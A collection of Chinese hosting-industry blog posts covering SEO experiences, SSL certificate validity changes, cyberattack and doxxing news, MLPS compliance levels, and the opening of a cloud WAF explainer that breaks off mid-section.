也不是说所有人都应该完全相信谷歌对于开放互联网的想法,毕竟相对于它的竞争对手们来说,谷歌做为一家搜索引擎和广告公司,它更能从强大且具有活力网页世界中获利。 #### 为境外“黑灰产”网站提供链接服务还拒不整改,站长被刑拘! 最近公安部公众号发布了一篇关于一位站长为境外“黑灰产”网站提供链接服务还拒不整改的案件,站长被刑拘了。 前因 2021年11月,四川遂宁大英县网警在工作中发现,大英鑫达网络科技有限公司旗下运营的“小K娱乐网”,数次为境外“黑灰产”网站提供链接服务,且未履行网络安全管理义务行为。 大英网安部门随即启动“一案双查”,依据《中华人民共和国网络安全法》第六十八条,对该公司作出行政处罚,责令其立即整改并关停网站。 拒不整改,变本加厉 2022年1月,大英网安部门在复检中,发现该公司仅将“小K娱乐网”站名变更为“小K网”,非但没有整改,反而继续利用新命名的原网站更新外挂违法信息。 面对大英鑫达网络科技有限公司长期拒不整改的行为,遂宁市公安局网安支队牵头,市县两级公安机关抽调网安、法制等警种会同属地派出所成立专案组,对该公司进行深入调查。 后果 经查,该公司法人邓某以15000每月的价格为境外赌博网站投放链接,非法获利高达20余万元。 在公安机关对网站下达整改通知并行政处罚后,邓某在高额利润诱惑下仍然不知悔改,妄图通过修改网站站名来逃避处罚。 目前,因拒不履行信息网络安全管理义务,按照《中华人民共和国刑法》第二百八十六条之一规定,以拒不履行信息网络安全管理义务罪,对该公司法人邓某采取刑事强制措施。其以投放赌博广告牟利的行为也已被公安机关另案处理。目前,案件还在进一步侦办中。 普法 《刑法》第二百八十六条之一网络服务提供者不履行法律、行政法规规定的信息网络安全管理义务,经监管部门责令采取改正措施而拒不改正,有下列情形之一的,处三年以下有期徒刑、拘役或者管制,并处或者单处罚金: (一)致使违法信息大量传播的; (二)致使用户信息泄露,造成严重后果的; (三)致使刑事案件证据灭失,情节严重的; (四)有其他严重情节的。 单位犯前款罪的,对单位判处罚金,并对其直接负责的主管人员和其他直接责任人员,依照前款的规定处罚。 有前两款行为,同时构成其他犯罪的,依照处罚较重的规定定罪处罚。 #### 为避免种族歧视,MySQL宣布删除黑名单白名单等术语 7月6日 消息:MySQL数据库的开发人员日前宣布,计划在数据库源代码和文档中停止使用并替换 master、 slave、 blacklist(黑名单)和whitelist(白名单)等术语。 MySQL团队在一篇博客中表示,他们将用source、replica、blocklist和allowlist等新术语替换现有术语。 据报道,MySQL团队在互联网上运行着第二大最受欢迎的数据库引擎,官方并未解释其改变术语决定的具体原因。而在这之前,其他多家公司和开源项目已经开始从他们的代码库和文档中删除相同的术语,理由是这些术语是有害且不敏感的语言,会导致种族偏见。 就在MySQL团队宣布这一决定的两天之后,Twitter的工程团队也宣布了类似的计划,改变内部工具及其开源项目中的术语。 据该公司称,Twitter的工程师们计划删除 9 个术语,其中同样包括whitelist、blacklist、 master/slave。另外,包括GitHub、Microsoft、 LinkedIn、Android、JP Morgan等多家公司和开源项目也作出了类似的改变。 #### 主机吧博客日IP访问量超过200了! 恩,主机吧博客从今天2月起开建的,一开始也只是想博客当成一个资料库来使用,没想到慢慢流量居然起来了。200IP每天对一个博客尤其是一个站长类的博客,已经算是真正起来了。 主要还是靠百度搜索引擎来的流量,所以跳出率非常高,当然也跟这边模板有关,点击页面都设置了bank属性,这个做主要是方便用户体验,但好像对搜索引擎优化不是很好,正在考虑要不要取消掉。 流量来源五花八门,这也符合网站可持续发展的情况,不要太依赖某个流量源,要不然哪天失去了,网站就等于挂了。后期这个考虑下增下互通功能。实在博客的互通性惨不忍睹。期待把博客做成一个每天几千IP访问的站长类网站,希望大家多多支持! #### 主机吧博客正式改名为主机帮! 运营了快十年的网站名:主机吧,想了很久,还是决定改名为了主机帮! 为什么改呢? 原因是主机吧这个名字百度降权了,搜索根本搜不到我们网站名,目前百度搜主机吧,基本都是百度贴吧的内容,以前主机吧是排前三的,今天突然被降了,而且搜前50都找不到,我们意识到可能百度对这个词进行了特殊处理了。 其实网站改名是一件相当艰难的事,因为以前的内容我们一直是以主机吧自称,改名字损失很大,但没办法,因为如果你的网站名称在百度搜索引擎上找不到的话,那相当于白运营了。 目前改名为主机帮,主要原因是主机帮这个词,我们网站一直是有排名的,而且不低。 希望未来网站可以从新运营起来吧,目前改名字面临的问题是备案还需要更改,我们以前ICP备案、公安备案都是用主机吧来命名,现在改成主机帮,帮到备案系统更改,还是挺麻烦的,不过,有些同学根本不改也没事,一般ICP备案没这么严。 #### 主机吧博客百度索引量已经连续半个月收录上涨了 从去年11月开始,主机吧博客就连接遭到了百度索引量大量下降的打击,虽然网站访问量并没有多大影响,不过看着索引量几百几十的下降,心里其实也有点慌。主机吧没有对网站做任何改变,因为流量并没有下降,所以主机吧坚信,那只是百度的正常操作。 这期间主机吧尽量的使用给网站增加原创,增加网站价值性,让用户访问网站内容浏览时间更长。在这期间索引量依然在上涨和下降中徘徊,总体还是下降事态,但是主机吧博客的流量却一直在上涨。服务器由于使用了百度的云服务器,稳定性也没得说。 就这样一直不断更新到今年3月,在三月初的时候遇到百度大调整,大量网站的索引量都大量降了。主机吧也减少了几百,不过半月后,主机吧索引量就一直在上涨。 也算是守得云开见太阳了,从这件事后,我们要了解一个经验,不要因为百度一时的索引量下降而自乱阵脚,主机吧见过太多站长都是因为索引量下降而大量改网站,更换服务器,结果越搞越差。其实对于百度来说我们能控制的东西很少,只能控制住服务器稳定,网站内容质量高就可以了,这里说的质量高不一定要原创,百度自己对原创的内容界定都很模糊,指望百度给你识别原创不现实,百度自己都下架了原创保护功能了。我们说的是内容有价值,能让别人搜到你文章的时候,停留的时候越长,百度的好感度越高。 好了,以上就是主机吧对待百度的一些经验,希望可以帮助大家把网站做大做强! #### 主机吧带你了解:免费SSL证书有效期为什么缩短至90天原因 SSL证书的主要作用有两个,一个是证明网站的身份,防止用户访问到假冒网站,另一个是能够对用户与服务器之间传输的数据进行加密,避免被恶意窃取。 当你在浏览器上看到一个网站地址前有一个小锁,或者地址栏显示https://  ,这就意味着该网站已经安装了SSL证书啦 不过,SSL 证书最近有一件值得关注的大事——免费证书的有效期都缩短到90天了! 为什么会缩短90天呢?今天主机吧就来说说: 免费证书有效期缩短的背景 SSL 证书在诞生之初其实并没有限制有效期,但后来随着 SSL 证书使用得越来越多,2005年5月17日由 VeriSign 和 Comodo 牵头成立国际标准组织CA/浏览器论坛,出台了一系列 SSL 证书标准,SSL 证书有效期开始缩短。 在这个论坛上,苹果等主流浏览器厂商多次提出了要继续缩短 SSL 证书的有效期至一年甚至更短,CA 机构(数字证书认证机构,负责发放和管理数字证书的权威机构)则进行抵制,两方来回拉扯。 直到2023年3月3日,谷歌发布了一个重磅话题讨论—— Moving Forward, Together(“共同前进”路线图),宣布计划将浏览器中 TLS 服务器身份验证证书有效期缩短至90天。也就是说,谷歌如果在未来哪一天正式实施了这个计划,那么任何有效期超过90天的新网站证书都不会受到谷歌浏览器的信任,用户浏览网站的时候会显示网站不安全。  截图来自谷歌Moving Forward, Together由于谷歌浏览器的市场影响力实在太大了,很多CA机构都跟着作出相应调整,所以从去年开始,大家就陆续收到各个CA机构、云厂商调整免费证书有效期的通知,腾讯云、阿里云、百度智能云的免费证书也相继将有效期从12个月调整为3个月。 为什么要缩短SSL证书的有效期呢?谷歌在Moving Forward, Together里有提到,希望能由此鼓励证书自动化,推动HTTPS生态系统摆脱“巴洛克式”(巴洛克式是一种艺术风格,巴洛克的本意就是不规则的,不常规的意思)、耗时且容易出错的颁发流程,降低人力成本和工作难度规避人为失误导致的事故。另一方面,有效期缩短后,用户需要不断续订,每次续订都会推动证书颁发机构再次验证最新的用户身份信息;而且SSL证书的加密算法不断发展,续订的证书可以采用最新的算法并进行密钥轮换。这些都让证书更加安全、可信。 然而,免费SSL证书有效期缩短,会对我们平时的网站管理产生影响。对于网站管理员来说,需要更频繁地更新和维护SSL证书,平时一张证书一年只需要更新一次,现在一年要更新四次。一旦忘了及时更新,用户在访问这些网站时可能会遇到警告,影响浏览体验,对网站的可信度产生质疑。 目前来说,解决办法有两个,一是购买收费版的SSL证书,这些证书一般都是有一年有效期的或者直接用自动化更新,目前像Let's Encrypt都是有自动化验证部署的。 #### 主机吧成功申请认证通过百度实名实网认证 之前有写过购买百度SSL送认证功能,经过一翻操作后,成功完成了认证! 这个认证目前只有企业网站可以申请,个人估计是没戏了,主机吧也是因为刚好是企业网站,所以申请过了。生效非常快。 搜索主机吧后,网址后面会显示一个“保”字标识,无形中给网友搜索的时候一些信任感,这对于企业网站来说是非常重要的。 如果你是企业网站不妨去试试吧,还是挺好申请的。 #### 主机吧更换网站主题了,愿以后更好! 主机吧建站以来一直不断的折腾主题,没办法,wordpress的模板真的多,而且好看免费的非常多,相当诱惑。几个月下来换了45次,用得最久的是苏醒Grace7的,免费的。后来发现这主题相当臃肿,而且在IE10下显示有问题,又换成了一个仿百度百家的。这个主题是网上分享下载来的,对优化还不错,就是代码有些老,头像调用的外国的服务器,有时候相当慢。到最后一狠心,就花钱换了这个Seven主题,563元!价格不算贵。用这个主题主要考虑到增加网站活跃度和商城购买功能,前些日子淘宝禁售游戏充值业务是给主机吧一个提醒的,不要把业务重新太过于放在淘宝上,毕竟是第三平台,什么规则别人说得算,而且主机吧的业务跟阿里云是有重合的,保不准哪天人家不让你在淘宝卖了。所以主机吧也正在慢慢运营起自己的商店,希望大家支持。当然收费主题相比免费主题的好处是,一次性购买终身升级。而免费主题难免以后代码落伍,对于我们这些不是专业人士来说,购买收费主题是不错的选择,可以专心做网站,而不必花时间在网站修改上,因为已经有人专业人帮你做了。最后提供下站长,还是少折腾网站主题,因为多多少少会影响网站排名,主机吧更换主题后这两天流量明显有些下降了,估计是内页排名下跌了些。稳定的网页是排名的保证。 #### 主题巴巴倒闭了? 网站都关了 最近主机吧想做一个杂志类的网站,搜了一圈,发现以前主题巴巴的杂志类主题不错,于是想买个试试,结果发现主题巴巴居然没了,官网已经打不开了。 主题巴巴是一家专注出售wordpress主题的团队,旗下模板众多,包含博客一号、博客二号、博客 X、门户一号、门户手机版、图片一号、杂志一号、自媒体一号、自媒体二号和主题巴巴SEO 插件。 主机吧多年前曾想用他们主题建博客,后来因为某些原因就没有用,没想到这才几年他们团队就没了,也不知道之前购买他们主题的用户还能不能用。 主机吧搜了下他们的微博,连微博也关了。 那些购买了他们永久会员的站长估计难受了。在论坛搜了下,很多站长在用他们家主题。 主机吧猜测关闭原因应该不是经济问题,毕竟主题都开发出来了,如果不想搞了,不维护就是了,模板不升级也没什么,真正原因可能是某些不可抗拒的原因吧,连微博都关了,要么是版权问题,要么就是某些违规问题,这里我们就不多猜测了,总之挺可惜的一家模板服务商,他们家的模板确实便宜。 最新消息: 原来是虚惊一场,主题巴巴网站重新上线了,主机吧查看了下,好像是换了公司备案重新上线了。 #### 主题巴巴运营不下去改行做电影站了 去年有报到过主题巴巴关闭的新闻,今年主题巴巴直接不做wordpress主题了,改成电影站了。 主机吧查看了下,该网站的备案号居然还在。 不知道是作者把网站卖了,还是自己改行做电影站了,如果是自己改做电影站的话,只能说胆子真大! 主题巴巴运营不下去其实跟这几年的建站行业有关,这两年做网站的个人企业实在太少了,基本都是一些存量的网站在运营,关的关,倒闭的倒闭。而作为专门卖建站主题的主题巴巴运营不下去实在太正常了。 主机吧目前用的7B2主题也半年多没见更新了,可见现在做网站的行情有多差。 目前主机一直在坚持做网站,而且保持更新,今年还做了一个新站,虽然很难做起来,但是做网站贵在坚持,站长共勉吧。 #### 乌克兰政府和银行遭大规模DDoS攻击 俄乌冲突爆发后,乌克兰国家特殊通信与信息保护局也通报了针对政府网站和银行的大规模 DDoS 攻击。此外追踪世界各地网络中断情况的 Netblocks 组织,也证实了包括外交部、国防部、内政部、安全局(SBU)、内阁在内的乌克兰政府网站已躺枪。 截图(来自:CIP.gov.ua) 尽管 Cloudflare 表示,与之前应对过的大型 DDoS 攻击相比,本轮攻击还算“相对温和”。 但乌克兰最大商业银行(PrivatBank)与国家储蓄银行(Oschadbank)的服务中断,还是造成了相当大的负面影响。 Cloudflare 发言人在接受 ZDNet 采访时称,其看到了在乌克兰发生的零星的 DDoS 活动。 本周看到的活跃度较上周更高,但仍低于一个月前的水平,该国仅个别网站遭到了破坏性的攻击。 乌克兰特殊通信与信息保护局在一份声明中称: 今日,我们看到多家乌克兰政府和银行机构网站再次遭遇大规模 DDoS 攻击。 部分信息系统的服务出现了不可用或时断时续的情况,这部分归咎于将流量切换至另一提供商,以尽量减少损失。 至于其它网站,目前看来还是有效地抵御了 DDoS 攻击、且处于可正常工作的状态。 银行网站截图 目前 CIP 和国家网络安全系统的其它部门正努力应对相关攻击,以及收集和分析相关信息。同时呼吁所有已经、或怀疑受到攻击的机构,都及时地向 CERT-UA 计算机应急响应小组通报。 然而当天晚些时候,ESET 研究人员又曝光了一款正在乌克兰地区冒头的新型数据擦除恶意软件。遥测信息显示,其已被安装到数百台机器上。 可知其滥用了 EaseUS Partition Master 软件中合法提供的驱动程序来造成破坏,在执行的最后一步,恶意软件还会重启计算机。 ESET 补充道,在其中一个目标组织中,擦除器使用了默认的域策略(GPO)来执行数据删除,意味着攻击者可能已经控制了机构内的活动目录(Active Directory)服务器。 正如许多人在网络上指出的那样,攻击开始于当地时间下午 16:00 左右,恰逢乌克兰议会开始讨论紧急状态声明。 在美国和北约均警告俄罗斯可能入侵、且俄军进入乌东地区两天之后,乌克兰政府已批准了为期 30 天的紧急状态。 #### 乌干达央行遭遇黑客攻击,数十亿资金损失 11 月 29 日消息,非洲国家乌干达财政部负责一般性事务的国务部长亨利・穆萨西齐(Henry Musasizi)当地时间昨日在该国议会确认,乌干达中央银行此前遭遇黑客攻击,出现了数十亿乌干达先令的资金损失。 穆萨西齐表示,乌干达审计长和警察刑事调查局 CID 正在就央行被黑客盗取资金一事展开调查,将于 1 个月后提交报告;他强调,本次事件并未严重到媒体报道的程度:此前当地媒体表示,央行账户被盗金额超 620 亿乌干达先令。据悉本次针对乌干达中央银行的攻击发生于今年 9 月,乌干达官方设法追踪到了部分转移至境外账户的资金并在海外工作人员的帮助下进行了冻结。 #### 乐高官网遭黑客入侵宣传加密货币 10 月 6 日消息,有网友称乐高官网 10 月 5 日出现奇怪的宣传横幅,该横幅声称“乐高币”现已正式上市,甚至承诺向购买的人提供“神秘奖励”,但乐高并没有真正推出官方加密货币。 根据 The Brick Fan 的说法,点击购买按钮会跳转到一个外部加密货币网站,该网站用以太坊出售“乐高代币”。 乐高官方很快删除了这一横幅,并向 Engadget 回应称没有用户账户受到损害,已经确定了问题的原因。 乐高官方还表示正在采取措施,防止今后再次发生类似情况。然而,该公司拒绝透露有关该“原因”或其正在实施措施的详细信息。IT之家附声明如下: 2024 年 10 月 5 日(美国时间 10 月 4 日晚),LEGO.com 上短暂出现了未经授权的横幅。该横幅很快被删除,问题已得到解决。没有用户账户受到损害,用户可以照常继续购物。原因已经查明,我们正在采取措施防止这种情况再次发生。 October 6th news, netizens reported that the official LEGO website featured a strange promotional banner on October 5th, claiming that "LEGO Coins" have officially been launched, and even promised "mysterious rewards" to those who purchase them. However, LEGO has not actually launched an official cryptocurrency. According to The Brick Fan, clicking the purchase button would redirect to an external cryptocurrency website selling "LEGO Tokens" using Ethereum. LEGO quickly removed the banner and responded to Engadget, stating that no user accounts were compromised and the cause of the issue has been identified. LEGO also stated that they are taking measures to prevent similar incidents from happening in the future. However, the company refused to disclose details about the "cause" or the measures they are implementing. IT Home released the following statement: On October 5th, 2024 (evening of October 4th, US time), an unauthorized banner briefly appeared on LEGO.com. The banner was quickly removed, and the issue has been resolved. No user accounts were compromised, and users can continue shopping as usual. The cause has been identified, and we are taking measures to prevent this from happening again. #### 九层妖塔字体侵权怎么回事?用了什么字体?赔了多少钱? 古语有云:一字值千金。在现在看来,这话一点都不假。据华商报消息,近日,《九层妖塔》的电影制作方、发行方因为 7 个字被告,判赔 14 万元。 7 个字赔 14 万,这是怎么回事呢?原来,《九层妖塔》电影出现的道具鬼族史图书、华夏日报报纸上使用了书法家向佳红的书法作品鬼、族、史、华、夏、日、报7 个单字。向佳红认为,电影制作方、发行方未经授权也未署名就使用这些字侵犯了他对上述书法作品享有的署名权、复制权。于是将其上诉至法院,要求对方赔偿 51 万,并公开道歉。 《九层妖塔》中的剧照截图 对于向佳红的指控,《九层妖塔》电影制作方、发行方表示不认同。他们认为,这些字出现在电影道具中,只是为说明道具名称,属于合理使用。而北京市朝阳区法院审理认为,向佳红的这 7 个单字具有书写者自己的个性,有其独特的艺术美感,属于著作权法规定的美术作品。因此判决电影制作方、发行方等 4 被告被判共同赔偿书法家向佳红 14 万元,并在在判决生效之日起 30 日内在报纸上公开道歉。 对此,网友表示支持维权。称现在的电影节目用别人音乐图片字体不但不给钱,甚至招呼都不打,是该好好治治了~ #### 买不到口罩?董明珠开始卖口罩了!格力口罩今日正式开售 3月9日 消息:今日,“董明珠自媒体”公众号发文宣布格力口罩正式开售。据悉,格力生产的KN95 防护级别一次性使用口罩、医用级别一次性使用医用口罩,今天将在“董明珠的店”上线。 用户可通过微信小程序进入董明珠的店首页,点击“口罩预约”广告位进入预约界面,预留用户手机号码进行预约;预约成功后,每人每天限购 1 盒,KN95 防护级别的一次性使用口罩 50 只/盒,一次性使用医用口罩 50 只/盒,预约成功用户只能从两款中选购一盒口罩; 具体活动时间为: 2020 年 3 月 9 日开始,每天10:00—11: 00 点开始预约,每天16:00—18: 00 点公布预约结果,每天16:00—18: 00 点开始购买。 2 月 12 日,董明珠对武汉格力全体员工发布慰问信称,除武汉基地以外,格力已经陆续复工,加紧生产温度计、口罩生产设备、护目镜、杀病毒空气净化器、“风无界”新风空调等一系列抗击疫情产品,为疫情而战。 #### 买二手域名这么判断域名好坏?新域名注册有哪些需要注意的事? 最近有客户问主机吧这个问题:买二手域名这么判断域名好坏?新域名注册有哪些需要注意的事? 今天我们就来谈谈如何判断一个域名的好坏? 一、域名后缀 千万别贪好记而选择一些非主流域名,那些域名实际上除了好记好听外,对你网站没有任何好处,首先一些非主流域名并不能在国内备案,没有备案相当于你只能用海外服务器,这本身就让你网站比别人矮了截;其次搜索引擎很难收录你的网站,如果细心观察百度搜索结果你就会发现,排名前十的几乎都是主流后缀域名,非主流域名的很少很少,甚至可以说没有,是用非主流域名做网站的人少吗?并不是,显然是搜索引擎对这些后缀的域名并不看好,甚至可以说不想收录。所以尽量选COM、NET、CN这类后缀的域名。 二、是否有黑历史 很多站长选域名的时候不留神这个问题,但是这个很重要的,一但网站被拉黑过,那么你很难解除限制,像QQ、微信对被拉黑的网站都是屏蔽的,百度更是直接不收录,还有一些更夸张的是被通信管局拦截,比如主机吧之前一直讨论过的某客户网站就是被河北通信管局给拦截了,凡是河北地区的都会被拦截。甚至有域名是直接被污染了,比如我们熟知的国外知名社交网站facebook就是被DNS污染了,国内根本访问不了。所以检查是否有黑历史很重要。 三、SEO有利度 好的后缀域名有利于搜索引擎收录,而与网站内容相当的域名是可以实实在在提升网站在搜索引擎的排名的,特别是拼音组合的域名,在百度上收录是非常有利的,这里主机吧举个案例,我们搜索关键词:购物帮,得到的搜索结果如下图,我们可以看到,使用拼音域名的网站明显排名更高,而且这个域名只是刚做了三个月而以,关键词排名排得比百度百科还高,这就是内容匹配度,你的域名跟你的关键词相符是可以得到很高的排名的,大家尝试搜索其他关键词就知道了。 好了,以上就是主机吧根据自己多年经验总结的一些域名选取经验,希望可以帮助大家。 #### 买卖备案域名被抓 主机帮经常看到有人在网上买备案域名,这里面不仅购买的人有风险,卖备案域名的人也有风险的,今天我们在公安公众号上,就看到一起因买卖备案域名被抓的案例。 #### 买卖机械网因被ddos攻击导致损失2.3万元 买卖机械网算是行业内比较知名的老牌B2B网站了,不过最近却因DDOS攻击导致无奈关站的命运。 事情是这样的,因为最近平时搞DDOS敲诈的这帮人盯上了B2B网站,买卖机械网就是倒霉的一个,被攻击后他们很快就切换了IP,并上线某公司的高防CDN,不过也正是因为上线这个高防CDN,导致欠费高达2.3万元。以下是买卖机械网官方的记录: 2020.11.12,我司服务器突然收到强烈DDos攻击,换新IP后切换到某家CDN隐藏IP做加速服务。 2020.11.13 11时,平台再次受到攻击,在不到20分钟内产生1.6万元的流量费用,随后3小时内,继续产生7000元费用,合计产生欠费2.3万元。 2020.11.13 16时,所有防护服务停止,提示欠费充值。 买卖机械网用的是哪家的高防CDN不得而知,不过弹性付费已经是行业内的惯例了,也就是高防CDN有一个保底的防御,而超过这个保底的防御后你就需要弹性付费,黑客攻击多少,你后期就要补多少钱上去才可以继续使用。像阿里云、腾讯云这类公司都是这么操作的,他们一点不担心你不还钱,因为在国内你根本离不开阿里腾讯。 如果怕付费的一般建议用百度云加速,只收套餐费,小量超了百度并不会给你停了,而且也不会有后付费问题,比较安全,业内高防CDN方面,百度资源是非常丰富的,节点多,防御便宜。 总之做网站其实真不容易,每天都要想着怎么产生内容,还要提防各种攻击,挂黑马,DDOS攻击等防不胜防,而且PC网站流量越来越少也是不争的事实,能活下来的网站已经是业内非常厉害的了,希望这次买卖机械网能够挺过去。   #### 买服务器千万别在小服务器商购买 相信很多站长都有在小服务器商买服务的经历,主机吧曾也有,记得当初在小服务器商买了一个虚拟主机,还是独立IP的,结果没用几天就说机房停止使用了,给更换到一个香港服务器了,慢得要死,还经常访问了,从那时候起主机吧就没在小服务器购买过服务。 即使在现在代理的产品也基本都是一些大牌的服务商,小服务商的服务购买还是谨慎再谨慎。为什么这么说呢?因为往往坑你的还是那些服务商自己,看下图: 那些小服务器商都是自己攻击自己的服务器,然后让客户加钱买防御。主机吧就曾遇到过一位客户,找这边购买防御,由于没有在服务器商那边购买,导致对方不肯更换服务器IP,最后客户一气之下买了别的服务器,再添加上这边高防CDN后,就没有再被攻击过。  有些不懂的客户就直接交钱中招了,结果他们根本没给服务器加什么防,白白赚了你防护的钱。   #### 买高防的注意哈:千万别找个人买 今早一位客户找到主机吧,说是要购买高防服务,还反馈说之前网站就做有高防了,今天打不开了,而做高防的那个人也联系不上。 极有可能跑路了,还好只是买了他们高防IP,如果是服务器就惨了,数据都会丢失。 在了解情况后我们得知这位客户是在淘宝上买的,而且是一个个人商家。有在淘宝购买过高防服务的同学都知道,淘宝上买的防御都是很便宜的,几十G几百G都是很便宜,有的几十块钱一个月,几百几千都可以买到标定很高的防御服务。 很多同学贪图便宜就买了他们服务,殊不知这些高防服务风险很大,首先这些卖得便宜的大多是个人店铺,因为没有责任风险他们可能随时跑路,到时损失的只能是各位同学,其次,那些标着很高防御的基本都是集群的或者虚标的,反正也不会真有这么大的攻击,即使有这么大攻击到时他们只要说攻击超量了,防不住你们也不知道。最后有些商家甚至购买黑客攻击自己的服务器,等超量了,让客户升级防御,主机吧上个月还遇到过这种。 所以购买的高防服务的同学一定要注意啦,谨慎购买。找服务要看准店铺是不是企业店,一般企业店都是有保障的。比如像主机吧的店铺。 然后找个中午吃饭时间咨询他们,看看有没有客服回复,或者周六周日,甚至找到联系电话,看看有没有人接,有些店铺平时根本没人管,出了故障找死都找不到人。 最后,还是建议大家选择大品牌防御,比如百度云加速,防御都是有保障的,即使防御不住他们也是给你退的,主机吧代理百度云加速多年了,服务都是非常好的,所以一般有客户联系这边防御的话我们都是首选推荐用百度云加速,一些像APP之类的用不了百度云加速的,我们才会推荐使用独立高防IP,当然这些也是我们多年合作商,都是有保障的。很多客户都是用来一段时间后觉得好,之后购买更多的,我们已经做高防业务这块5 6年了,值得信赖,有需要的同学可以找我们。 #### 事情闹大了!百度副总裁“谢广军女儿开盒事件”始末 百度每次上热搜,都是因为负面新闻,本次也不例外,作为百度智能云的代理,挺无奈的。 事件起因 孕妇评论引发争议2025年3月,一名孕妇在社交媒体对韩国明星张元英的行程发表中立评论,因“未使用足够尊敬的措辞”遭粉丝群体围攻。随后,该孕妇的个人信息(包括姓名、身份证号、手机号等)被恶意曝光,并遭受网络暴力和线下骚扰。 谢广军女儿卷入风波在攻击孕妇的粉丝群体中,一名微博用户“眼眸”被指参与“开盒”行为。网友通过比对账号信息,发现“眼眸”自称在加拿大留学,并曾晒出父亲月薪22万元的百度在职证明,最终锁定其身份为百度副总裁谢广军13岁的女儿。 事件发酵 “开盒者反被开盒”的荒诞局面涉事女孩的隐私信息(如家庭背景、订单截图等)也被网友曝光,形成“施暴者同时成为受害者”的戏剧性局面。网友进一步质疑其是否利用百度内部资源获取他人隐私数据。 舆论焦点与争议 数据泄露质疑:有传言称涉事女孩通过“百度数据库”获取隐私信息,引发公众对百度数据安全的担忧。但后续调查显示,“开盒”更可能通过“社工库”(暗网中泄露的公民信息数据库)完成,与百度无关。 未成年人行为失范:13岁未成年人深度参与饭圈“开盒”行为,被曝涉及上百人,甚至形成跨国网络暴力产业链,凸显未成年人网络素养缺失问题。 谢广军与百度的回应 谢广军道歉与争议 3月17日,谢广军通过微信朋友圈致歉,承认对女儿疏于管教,未及时引导其尊重隐私,并请求公众给予未成年人改正空间。 部分网友认为其道歉避重就轻,未能回应“百度数据是否泄露”的核心质疑,导致舆论进一步发酵。 百度官方回应 百度安全负责人陈洋于3月18日回应称,经调查,事件数据并非从百度泄露。百度内部数据已做匿名化处理,且谢广军无权限访问用户数据库。 百度因未及时公开回应数据安全问题,其新发布的“文心大模型4.5”官微评论区被网友负面评论刷屏,品牌形象受损。 法律与社会影响 法律责任认定 根据律师分析,13岁未成年人实施侵权行为,需由监护人承担民事赔偿责任;若涉及行政责任,14岁以下未成年人无需受行政处罚,但监护人需加强管教。 中央网信办自2024年“清朗行动”起已查处383名网暴者,但“开盒”因技术门槛低、跨境追责难等问题,打击难度较高。 公众反应与行业反思 事件引发对互联网平台数据安全、饭圈文化乱象及未成年人网络教育的广泛讨论。网友呼吁加强隐私保护立法和平台监管。 百度股价在事件曝光后逆势上涨,但公众信任度受挫,舆情危机凸显大厂高管家庭行为对企业形象的影响。 后续处理 涉事微博账号“眼眸”及被攻击孕妇的账号均被平台封禁或注销。 截至3月18日,百度尚未公布进一步调查结果,公众仍在等待更透明的信息披露。 总结 该事件不仅是一起由追星引发的网络暴力案件,更暴露了未成年人网络行为失范、平台数据安全隐忧及社会对隐私保护的迫切需求。技术便利与法律滞后的矛盾,使得“开盒”等行为屡禁不止,需多方协同治理方能遏制乱象。 #### 二季度网信部门责令关闭一批恶意营销账号 关闭违法网站2686家 据央视新闻报道,全国网信系统二季度约谈网站 1009 家,会同电信主管部门取消违法网站许可或备案、关闭违法网站2686家。各级网信部门针对部分账号为获取流量和广告,诋毁抹黑英烈、冒用权威人士发布谣言、大打色情“擦边球”以及“标题党”“黑公关”等恶意营销行为,责令相关网站平台依法依约关闭“深度解读”“黑幕爆料室”“每日速递热闻”“缘见有约”等一批恶意营销账号。 #### 二级与三级等保区别详解 中国网络安全等级保护制度(等保)中,二级等保和三级等保是应用最广泛的等级,其核心区别体现在防护强度、适用范围、技术要求和管理要求上。以下是详细对比: 一、核心区别概览 对比项二级等保三级等保适用对象一般信息系统(受损后影响较大)重要信息系统(受损后影响严重)防护目标抵御常见攻击抵御大规模恶意攻击测评周期每2年一次每1年一次安全审计基本日志记录实时监控+审计轨迹完整性网络架构基础分区防护严格区域隔离+冗余设计身份认证口令认证双因素认证(如密码+动态令牌)灾备要求本地备份异地实时备份+热备机制 二、具体要求差异详解 1. 技术要求 安全层面二级等保三级等保物理安全机房门禁、防火防潮生物识别门禁+电磁屏蔽+24小时监控网络安全基础防火墙/VLAN隔离入侵检测(IDS)、防病毒网关、网络加密主机安全主机审计、漏洞扫描强制访问控制、程序白名单、防篡改应用安全用户身份鉴别、基本权限控制抗抵赖机制、会话超时锁定、代码安全审计数据安全传输保密性、存储完整性存储加密+异地容灾+敏感数据脱敏 关键差异:三级等保要求双因素认证、异地备份、入侵防御系统(IPS) 和通信加密(如TLS/SSL),二级无强制要求。 2. 管理要求 管理领域二级等保三级等保安全机构兼职安全管理员专职安全团队+岗位分离运维管理定期漏洞扫描实时监控+自动化告警+渗透测试应急响应基础应急预案定期演练+国家级漏洞上报机制人员培训年度安全意识教育每半年培训+岗位技能考核 关键差异:三级需建立独立安全部门,制定灾难恢复计划,且每年至少开展1次攻防演练。 三、典型应用场景 二级等保:地方企业官网、非金融类APP、学校教务系统、中小医院信息系统。(例:某市图书馆借阅系统) 三级等保:政务平台、金融交易系统、电力调度系统、三甲医院核心业务、大型电商平台。(例:省社保结算系统、证券交易APP) 四、实施成本差异 项目二级等保三级等保测评费用5万~15万元15万~40万元整改成本20万~50万元50万~200万元以上时间周期3~6个月6~12个月 注:三级因需部署IPS、堡垒机、数据库审计等专用设备,成本显著提高。 五、如何选择等级? 根据《等保2.0》定级指南: 受侵害客体: 二级:公民/企业权益; 三级:社会秩序或公共利益(如交通、金融)。 损害程度: 二级:较大损害(如局部业务中断); 三级:严重损害(如大规模数据泄露、生命危险)。 ⚠️ 注意:教育、医疗、能源等行业核心系统通常强制要求三级等保。 六、常见误区 误区1:三级等保只需技术达标。正解:管理要求(如安全制度、应急预案)占比测评分数的40%,不可忽视。 误区2:云服务可直接复用云平台等保证书。正解:需单独测评云上业务系统(云平台资质仅降低部分测评项)。 建议:提前半年规划,优先整改“一票否决项”(如三级等保的双因素认证、日志审计留存≥6个月)。 #### 云WAF是如何实现高效防护的?详解5大核心技术原理 云WAF(Web应用防火墙)是一种基于云计算的网络安全服务,通过多维度技术手段实现对Web应用的实时防护。其核心防护机制结合了流量监控、规则匹配、行为分析、机器学习等技术,以下是其实现防护的主要方式: 一、流量监控与反向代理模式 流量牵引与反向代理云WAF通常以反向代理模式部署在用户与Web服务器之间,所有流量需先经过WAF检测。例如,通过DNS解析(如CNAME方式)或负载均衡将流量引至WAF集群,确保攻击者无法直接访问源站服务器。 全流量深度检测对HTTP/HTTPS请求的头部、URL、参数、请求体等进行逐层解析,识别异常模式或恶意代码片段(如SQL注入语句、XSS脚本)。 二、攻击检测技术 